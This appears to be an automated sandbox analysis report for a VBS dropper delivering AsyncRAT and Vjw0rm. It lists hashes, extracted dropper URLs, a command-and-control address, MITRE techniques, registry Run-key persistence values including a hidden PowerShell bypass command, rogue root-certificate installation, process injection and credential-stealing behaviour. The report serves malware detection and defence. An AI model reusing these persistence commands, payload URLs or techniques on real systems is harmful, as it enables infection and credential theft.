asyncrat | 1836bc14a38837046d3937aef05eee266da919d296cfab066317b0db4ba48d21

Analysis

max time kernel
1198s
max time network
1202s
platform
windows10-2004_x64
resource
win10v2004-en-20220112
submitted
27-02-2022 13:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Required-document.vbs
Size

59KB
MD5

a3b2efc3e12c3dd4f6c343d8e768a01c
SHA1

72cdb5d6fd134ec0920cb8b4342adf0e3a961025
SHA256

1836bc14a38837046d3937aef05eee266da919d296cfab066317b0db4ba48d21
SHA512

089140d2a092c8737aea06e959e06d674addba76a2be4114540a9616d450f5890d888624fcf73129e16801c97a5bd1be39544ccacb26e7f471f25b860f4b3e03

Score

10^/10

asyncrat vjw0rm collection persistence rat spyware stealer suricata trojan worm

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://ec2-3-235-29-66.compute-1.amazonaws.com/wrold/LM.txt

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://ec2-3-235-29-66.compute-1.amazonaws.com/windows/Filnal.txt

Extracted

Family

vjw0rm

http://invoice-update.myiphost.com:1188

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Vjw0rm
Vjw0rm is a remote access trojan written in JavaScript.
trojan worm vjw0rm
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata: ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server)
suricata

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/2984-193-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 11 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

flow	pid	process
20	1612	powershell.exe
38	3800	powershell.exe
46	1612	powershell.exe
93	3188	powershell.exe
95	3188	powershell.exe
97	3188	powershell.exe
99	3188	powershell.exe
101	3188	powershell.exe
103	3188	powershell.exe
105	3188	powershell.exe
107	3188	powershell.exe

Downloads MZ/PE file
Executes dropped EXE 3 IoCs

Processes:

Untitled.exe7z.exeAllInOnePasswordRecoveryPro.exe

pid process

3456 Untitled.exe
3904 7z.exe
3300 AllInOnePasswordRecoveryPro.exe

pid	process
3456	Untitled.exe
3904	7z.exe
3300	AllInOnePasswordRecoveryPro.exe

Checks computer location settings 2 TTPs 14 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation	WScript.exe

Loads dropped DLL 2 IoCs

Processes:

7z.exeAllInOnePasswordRecoveryPro.exe

pid process

3904 7z.exe
3300 AllInOnePasswordRecoveryPro.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3904	7z.exe
3300	AllInOnePasswordRecoveryPro.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

AllInOnePasswordRecoveryPro.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	AllInOnePasswordRecoveryPro.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2 = "C:\\Windows\\System32\\cmd.exe '/c powershell -windo 1 -noexit -exec bypass -file C:\\ProgramData\\Twitter\\log\\look.ps1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1 = "C:\\ProgramData\\Twitter\\log\\Untitled.exe"	reg.exe

Suspicious use of SetThreadContext 9 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1140 set thread context of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 3352 set thread context of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 2196 set thread context of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2080 set thread context of 1568	2080	powershell.exe	aspnet_compiler.exe
PID 1256 set thread context of 1748	1256	powershell.exe	aspnet_compiler.exe
PID 1708 set thread context of 3920	1708	powershell.exe	aspnet_compiler.exe
PID 976 set thread context of 2496	976	powershell.exe	aspnet_compiler.exe
PID 556 set thread context of 492	556	powershell.exe	aspnet_compiler.exe
PID 2616 set thread context of 2208	2616	powershell.exe	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies registry class 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings	powershell.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

Untitled.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Untitled.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	Untitled.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Untitled.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Untitled.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	Untitled.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeaspnet_compiler.exepowershell.exeAllInOnePasswordRecoveryPro.exepowershell.exepowershell.exepowershell.exe

pid	process
1612	powershell.exe
1612	powershell.exe
3800	powershell.exe
3800	powershell.exe
3168	powershell.exe
3168	powershell.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
3260	powershell.exe
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
1140	powershell.exe
3260	powershell.exe
3260	powershell.exe
3352	powershell.exe
3352	powershell.exe
3260	powershell.exe
3260	powershell.exe
2196	powershell.exe
2196	powershell.exe
3260	powershell.exe
3260	powershell.exe
2080	powershell.exe
2080	powershell.exe
2080	powershell.exe
2080	powershell.exe
3260	powershell.exe
3260	powershell.exe
1256	powershell.exe
1256	powershell.exe
3260	powershell.exe
3260	powershell.exe
1708	powershell.exe
1708	powershell.exe
3260	powershell.exe
2080	powershell.exe
2984	aspnet_compiler.exe
2080	powershell.exe
3188	powershell.exe
3188	powershell.exe
3260	powershell.exe
3300	AllInOnePasswordRecoveryPro.exe
3300	AllInOnePasswordRecoveryPro.exe
976	powershell.exe
976	powershell.exe
3260	powershell.exe
3260	powershell.exe
556	powershell.exe
556	powershell.exe
3260	powershell.exe
3260	powershell.exe
2616	powershell.exe
2616	powershell.exe
3260	powershell.exe
3260	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1612	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeIncreaseQuotaPrivilege	3800	powershell.exe
Token: SeSecurityPrivilege	3800	powershell.exe
Token: SeTakeOwnershipPrivilege	3800	powershell.exe
Token: SeLoadDriverPrivilege	3800	powershell.exe
Token: SeSystemProfilePrivilege	3800	powershell.exe
Token: SeSystemtimePrivilege	3800	powershell.exe
Token: SeProfSingleProcessPrivilege	3800	powershell.exe
Token: SeIncBasePriorityPrivilege	3800	powershell.exe
Token: SeCreatePagefilePrivilege	3800	powershell.exe
Token: SeBackupPrivilege	3800	powershell.exe
Token: SeRestorePrivilege	3800	powershell.exe
Token: SeShutdownPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeSystemEnvironmentPrivilege	3800	powershell.exe
Token: SeRemoteShutdownPrivilege	3800	powershell.exe
Token: SeUndockPrivilege	3800	powershell.exe
Token: SeManageVolumePrivilege	3800	powershell.exe
Token: 33	3800	powershell.exe
Token: 34	3800	powershell.exe
Token: 35	3800	powershell.exe
Token: 36	3800	powershell.exe
Token: SeIncreaseQuotaPrivilege	3800	powershell.exe
Token: SeSecurityPrivilege	3800	powershell.exe
Token: SeTakeOwnershipPrivilege	3800	powershell.exe
Token: SeLoadDriverPrivilege	3800	powershell.exe
Token: SeSystemProfilePrivilege	3800	powershell.exe
Token: SeSystemtimePrivilege	3800	powershell.exe
Token: SeProfSingleProcessPrivilege	3800	powershell.exe
Token: SeIncBasePriorityPrivilege	3800	powershell.exe
Token: SeCreatePagefilePrivilege	3800	powershell.exe
Token: SeBackupPrivilege	3800	powershell.exe
Token: SeRestorePrivilege	3800	powershell.exe
Token: SeShutdownPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeSystemEnvironmentPrivilege	3800	powershell.exe
Token: SeRemoteShutdownPrivilege	3800	powershell.exe
Token: SeUndockPrivilege	3800	powershell.exe
Token: SeManageVolumePrivilege	3800	powershell.exe
Token: 33	3800	powershell.exe
Token: 34	3800	powershell.exe
Token: 35	3800	powershell.exe
Token: 36	3800	powershell.exe
Token: SeIncreaseQuotaPrivilege	3800	powershell.exe
Token: SeSecurityPrivilege	3800	powershell.exe
Token: SeTakeOwnershipPrivilege	3800	powershell.exe
Token: SeLoadDriverPrivilege	3800	powershell.exe
Token: SeSystemProfilePrivilege	3800	powershell.exe
Token: SeSystemtimePrivilege	3800	powershell.exe
Token: SeProfSingleProcessPrivilege	3800	powershell.exe
Token: SeIncBasePriorityPrivilege	3800	powershell.exe
Token: SeCreatePagefilePrivilege	3800	powershell.exe
Token: SeBackupPrivilege	3800	powershell.exe
Token: SeRestorePrivilege	3800	powershell.exe
Token: SeShutdownPrivilege	3800	powershell.exe
Token: SeDebugPrivilege	3800	powershell.exe
Token: SeSystemEnvironmentPrivilege	3800	powershell.exe
Token: SeRemoteShutdownPrivilege	3800	powershell.exe
Token: SeUndockPrivilege	3800	powershell.exe
Token: SeManageVolumePrivilege	3800	powershell.exe
Token: 33	3800	powershell.exe
Token: 34	3800	powershell.exe
Token: 35	3800	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

AllInOnePasswordRecoveryPro.exe

pid process

3300 AllInOnePasswordRecoveryPro.exe
3300 AllInOnePasswordRecoveryPro.exe

pid	process
3300	AllInOnePasswordRecoveryPro.exe
3300	AllInOnePasswordRecoveryPro.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.execmd.execmd.exepowershell.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.execmd.exepowershell.exeWScript.exe

description	pid	process	target process
PID 312 wrote to memory of 2120	312	WScript.exe	cmd.exe
PID 312 wrote to memory of 2120	312	WScript.exe	cmd.exe
PID 2120 wrote to memory of 1612	2120	cmd.exe	powershell.exe
PID 2120 wrote to memory of 1612	2120	cmd.exe	powershell.exe
PID 312 wrote to memory of 3448	312	WScript.exe	cmd.exe
PID 312 wrote to memory of 3448	312	WScript.exe	cmd.exe
PID 3448 wrote to memory of 3800	3448	cmd.exe	powershell.exe
PID 3448 wrote to memory of 3800	3448	cmd.exe	powershell.exe
PID 1612 wrote to memory of 3916	1612	powershell.exe	WScript.exe
PID 1612 wrote to memory of 3916	1612	powershell.exe	WScript.exe
PID 3800 wrote to memory of 3168	3800	powershell.exe	powershell.exe
PID 3800 wrote to memory of 3168	3800	powershell.exe	powershell.exe
PID 3916 wrote to memory of 2424	3916	WScript.exe	cmd.exe
PID 3916 wrote to memory of 2424	3916	WScript.exe	cmd.exe
PID 2424 wrote to memory of 1208	2424	cmd.exe	reg.exe
PID 2424 wrote to memory of 1208	2424	cmd.exe	reg.exe
PID 2424 wrote to memory of 1036	2424	cmd.exe	reg.exe
PID 2424 wrote to memory of 1036	2424	cmd.exe	reg.exe
PID 1612 wrote to memory of 3260	1612	powershell.exe	powershell.exe
PID 1612 wrote to memory of 3260	1612	powershell.exe	powershell.exe
PID 3260 wrote to memory of 3456	3260	powershell.exe	Untitled.exe
PID 3260 wrote to memory of 3456	3260	powershell.exe	Untitled.exe
PID 3260 wrote to memory of 3456	3260	powershell.exe	Untitled.exe
PID 3284 wrote to memory of 3640	3284	WScript.exe	cmd.exe
PID 3284 wrote to memory of 3640	3284	WScript.exe	cmd.exe
PID 3640 wrote to memory of 1140	3640	cmd.exe	powershell.exe
PID 3640 wrote to memory of 1140	3640	cmd.exe	powershell.exe
PID 1140 wrote to memory of 3316	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 3316	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 3316	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1140 wrote to memory of 2984	1140	powershell.exe	aspnet_compiler.exe
PID 1240 wrote to memory of 820	1240	WScript.exe	cmd.exe
PID 1240 wrote to memory of 820	1240	WScript.exe	cmd.exe
PID 820 wrote to memory of 3352	820	cmd.exe	powershell.exe
PID 820 wrote to memory of 3352	820	cmd.exe	powershell.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 3352 wrote to memory of 1276	3352	powershell.exe	aspnet_compiler.exe
PID 524 wrote to memory of 940	524	WScript.exe	cmd.exe
PID 524 wrote to memory of 940	524	WScript.exe	cmd.exe
PID 940 wrote to memory of 2196	940	cmd.exe	powershell.exe
PID 940 wrote to memory of 2196	940	cmd.exe	powershell.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
PID 2196 wrote to memory of 2292	2196	powershell.exe	aspnet_compiler.exe
